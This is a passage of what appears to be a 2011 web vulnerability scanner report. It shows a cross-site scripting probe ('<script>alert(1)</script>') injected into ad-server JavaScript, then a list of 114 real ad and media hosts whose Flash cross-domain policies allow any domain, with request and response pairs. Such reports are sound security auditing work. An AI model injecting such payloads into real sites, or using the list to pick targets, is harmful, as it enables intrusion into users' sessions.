if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='advertop100';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='4519310753761778d<script>alert(1)</script>c1409145956';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='17442218741308249307';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTca
...[SNIP]...

4. Flash cross-domain policy previous next
There are 114 instances of this issue:

http://a.rfihub.com/crossdomain.xml
http://a.tribalfusion.com/crossdomain.xml
http://a1.interclick.com/crossdomain.xml
http://a1.sndcdn.com/crossdomain.xml
http://action.mathtag.com/crossdomain.xml
http://ad.doubleclick.net/crossdomain.xml
http://admeld.adnxs.com/crossdomain.xml
http://ads.pointroll.com/crossdomain.xml
http://ads.undertone.com/crossdomain.xml
http://adserver.adtechus.com/crossdomain.xml
http://adsfac.us/crossdomain.xml
http://altfarm.mediaplex.com/crossdomain.xml
http://amch.questionmarket.com/crossdomain.xml
http://ar.voicefive.com/crossdomain.xml
http://audit.303br.net/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://b.voicefive.com/crossdomain.xml
http://b3.mookie1.com/crossdomain.xml
http://bs.serving-sys.com/crossdomain.xml
http://c.betrad.com/crossdomain.xml
http://c7.zedo.com/crossdomain.xml
http://cache.specificmedia.com/crossdomain.xml
http://cas.criteo.com/crossdomain.xml
http://cctrkom.creditcards.com/crossdomain.xml
http://cdn.interclick.com/crossdomain.xml
http://cdn.turn.com/crossdomain.xml
http://cdn5.tribalfusion.com/crossdomain.xml
http://core.insightexpressai.com/crossdomain.xml
http://cts-log.channelintelligence.com/crossdomain.xml
http://d7.zedo.com/crossdomain.xml
http://dar.youknowbest.com/crossdomain.xml
http://dis.ny.us.criteo.com/crossdomain.xml
http://ds.serving-sys.com/crossdomain.xml
http://ebay.adnxs.com/crossdomain.xml
http://external.ak.fbcdn.net/crossdomain.xml
http://fls.doubleclick.net/crossdomain.xml
http://fw.adsafeprotected.com/crossdomain.xml
http://homedepot.ugc.bazaarvoice.com/crossdomain.xml
http://i1.sndcdn.com/crossdomain.xml
http://ib.adnxs.com/crossdomain.xml
http://ic.nexac.com/crossdomain.xml
http://idcs.interclick.com/crossdomain.xml
http://img.mediaplex.com/crossdomain.xml
http://impl.ackak.com/crossdomain.xml
http://js.revsci.net/crossdomain.xml
http://l2.betrad.com/crossdomain.xml
http://log30.doubleverify.com/crossdomain.xml
http://media2.legacy.com/crossdomain.xml
http://metrics.citibank.com/crossdomain.xml
http://oimg.nbcuni.com/crossdomain.xml
http://om.dowjoneson.com/crossdomain.xml
http://p.addthis.com/crossdomain.xml
http://pbid.pro-market.net/crossdomain.xml
http://pix04.revsci.net/crossdomain.xml
http://pixel.adsafeprotected.com/crossdomain.xml
http://pixel.everesttech.net/crossdomain.xml
http://pixel.invitemedia.com/crossdomain.xml
http://pixel.quantserve.com/crossdomain.xml
http://puma.vizu.com/crossdomain.xml
http://r.turn.com/crossdomain.xml
http://radiumone.com/crossdomain.xml
http://reviews.homedepot.com/crossdomain.xml
http://rmd.atdmt.com/crossdomain.xml
http://rp.gwallet.com/crossdomain.xml
http://rs.gwallet.com/crossdomain.xml
http://secure-us.imrworldwide.com/crossdomain.xml
http://segment-pixel.invitemedia.com/crossdomain.xml
http://spe.atdmt.com/crossdomain.xml
http://sync.mathtag.com/crossdomain.xml
http://t.mookie1.com/crossdomain.xml
http://tags.bluekai.com/crossdomain.xml
http://tf.nexac.com/crossdomain.xml
http://ttwbs.channelintelligence.com/crossdomain.xml
http://va.px.invitemedia.com/crossdomain.xml
http://wasc.homedepot.com/crossdomain.xml
http://www.creditcards.com/crossdomain.xml
http://www.wunderground.com/crossdomain.xml
http://www2.sesamestats.com/crossdomain.xml
http://adadvisor.net/crossdomain.xml
http://ads.bridgetrack.com/crossdomain.xml
http://ads.cleveland.com/crossdomain.xml
http://ads.nj.com/crossdomain.xml
http://ads.oregonlive.com/crossdomain.xml
http://ads1.msn.com/crossdomain.xml
http://adx.g.doubleclick.net/crossdomain.xml
http://check4.facebook.com/crossdomain.xml
http://check6.facebook.com/crossdomain.xml
http://edge.sharethis.com/crossdomain.xml
http://feeds.bbci.co.uk/crossdomain.xml
http://googleads.g.doubleclick.net/crossdomain.xml
http://login.dotomi.com/crossdomain.xml
http://media.cnbc.com/crossdomain.xml
http://newsrss.bbc.co.uk/crossdomain.xml
http://oc.creditcards.com/crossdomain.xml
http://online.wsj.com/crossdomain.xml
http://optimized-by.rubiconproject.com/crossdomain.xml
http://p.opt.fimserve.com/crossdomain.xml
http://pagead2.googlesyndication.com/crossdomain.xml
http://quote.cnbc.com/crossdomain.xml
http://rd.rlcdn.com/crossdomain.xml
http://rover.ebay.com/crossdomain.xml
http://search.cnbc.com/crossdomain.xml
http://soundcloud.com/crossdomain.xml
https://soundcloud.com/crossdomain.xml
http://static.ak.fbcdn.net/crossdomain.xml
http://w.sharethis.com/crossdomain.xml
http://www.cnbc.com/crossdomain.xml
http://www.facebook.com/crossdomain.xml
http://www.homedepot.com/crossdomain.xml
http://www.res-x.com/crossdomain.xml
http://www.wtp101.com/crossdomain.xml
http://citi.bridgetrack.com/crossdomain.xml
http://creditcards.citicards.com/crossdomain.xml
http://ilslaunch.app2.hubspot.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://a.rfihub.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.rfihub.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.rfihub.com

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/xml;charset=ISO-8859-1
Content-Length: 199

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.2. http://a.tribalfusion.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.3. http://a1.interclick.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1.interclick.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: a1.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 11 May 2011 18:34:52 GMT
Accept-Ranges: bytes
ETag: "e02dbd1da10cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 16 Jun 2011 11:32:16 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.4. http://a1.sndcdn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1.sndcdn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: a1.sndcdn.com

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/xml
X-Cacheable: YES
X-Varnish: 876727367 868901663
Cache-Control: max-age=307478671
Expires: Sun, 14 Mar 2021 14:12:07 GMT
Date: Thu, 16 Jun 2011 19:27:36 GMT
Content-Length: 280
Connection: close
X-N: S

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<site-
...[SNIP]...

4.5. http://action.mathtag.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://action.mathtag.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: action.mathtag.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 215
Date: Fri, 17 Jun 2011 10:41:00 GMT
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

4.6. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Thu, 16 Jun 2011 11:22:22 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.7. http://admeld.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: admeld.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 17-Jun-2011 12:05:59 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Wed, 14-Sep-2011 12:05:59 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.8. http://ads.pointroll.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:17a0"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Thu, 16 Jun 2011 13:13:12 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.9. http://ads.undertone.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 09 Jun 2011 22:26:04 GMT
ETag: "399821c-fc-4a54ef0461700"
Accept-Ranges: bytes
Content-Length: 252
Content-Type: text/xml
Date: Thu, 16 Jun 2011 12:07:42 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.10. http://adserver.adtechus.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: adserver.adtechus.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

4.11. http://adsfac.us/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adsfac.us
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: adsfac.us

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 30 Sep 2008 00:31:21 GMT
Accept-Ranges: bytes
ETag: "0291dc9322c91:0"
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Thu, 16 Jun 2011 17:25:14 GMT
Connection: close
Content-Length: 125

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
</cross-domain-policy>

4.12. http://altfarm.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Thu, 16 Jun 2011 12:10:56 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.13. http://amch.questionmarket.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:53:19 GMT
Server: Apache/2.2.3
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "e0686c83-d1-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 209
Keep-Alive: timeout=5, max=710
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

4.14. http://ar.voicefive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 13:08:24 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.15. http://audit.303br.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://audit.303br.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: audit.303br.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1304446860000"
Last-Modified: Tue, 03 May 2011 18:21:00 GMT
Content-Type: application/xml
Content-Length: 202
Date: Thu, 16 Jun 2011 13:37:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.16. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 17 Jun 2011 10:51:03 GMT
Date: Thu, 16 Jun 2011 10:51:03 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.17. http://b.voicefive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 17 Jun 2011 12:51:27 GMT
Date: Thu, 16 Jun 2011 12:51:27 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.18. http://b3.mookie1.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b3.mookie1.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:52:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Wed, 02 Jun 2010 20:24:31 GMT
ETag: "178820c-d0-48811e09c3dc0"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.19. http://bs.serving-sys.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 16 Jun 2011 15:52:11 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

4.20. http://c.betrad.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.betrad.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Thu, 16 Jun 2011 14:39:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.21. http://c7.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "77adf2-f7-44d91a5da81c0"
X-Varnish: 1751289574 1751289246
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=4170
Date: Thu, 16 Jun 2011 11:29:29 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.22. http://cache.specificmedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cache.specificmedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 14:39:50 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n30 ( iad-agg-n18), ht-d iad-agg-n18.panthercdn.com
ETag: "17186ff-110-4764a5a086640"
Cache-Control: max-age=604800
Expires: Fri, 17 Jun 2011 18:37:31 GMT
Age: 504139
Content-Length: 272
Content-Type: application/xml
Last-Modified: Mon, 19 Oct 2009 14:13:37 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-d
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.23. http://cas.criteo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cas.criteo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cas.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Thu, 16 Jun 2011 13:04:15 GMT
Expires: Sun, 10 Jun 2012 13:04:15 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.24. http://cctrkom.creditcards.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cctrkom.creditcards.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cctrkom.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:39:35 GMT
Server: Omniture DC/2.0.0
xserver: www653
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.25. http://cdn.interclick.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.interclick.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.interclick.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 14:19:13 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n22 ( iad-agg-n12), ht-d iad-agg-n12.panthercdn.com
ETag: "e02dbd1da10cc1:0"
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Cache-Control: max-age=604800
Expires: Sun, 19 Jun 2011 14:28:33 GMT
Age: 345041
Content-Length: 225
Content-Type: text/xml
Last-Modified: Wed, 11 May 2011 18:34:52 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.26. http://cdn.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Thu, 16 Jun 2011 12:06:48 GMT
Date: Thu, 16 Jun 2011 12:06:48 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

4.27. http://cdn5.tribalfusion.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn5.tribalfusion.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn5.tribalfusion.com

Response

HTTP/1.0 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
Content-Length: 102
X-Reuse-Index: 462
Content-Type: text/xml
Date: Thu, 16 Jun 2011 14:08:53 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.28. http://core.insightexpressai.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://core.insightexpressai.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: core.insightexpressai.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 02 Feb 2010 21:21:42 GMT
ETag: "0f7cfb64da4ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 16 Jun 2011 11:27:39 GMT
Content-Length: 139
Connection: close
Cache-Control: no-store

<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

4.29. http://cts-log.channelintelligence.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cts-log.channelintelligence.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cts-log.channelintelligence.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:32:19 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
Content-Length: 1137
content-type: application/xml
Age: 0
Via: 1.1 ric061004 (MII-APC/1.6)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.30. http://d7.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=870
Date: Thu, 16 Jun 2011 11:28:58 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.31. http://dar.youknowbest.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dar.youknowbest.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: dar.youknowbest.com

Response

HTTP/1.0 200 OK
Content-Length: 207
Content-Type: text/xml
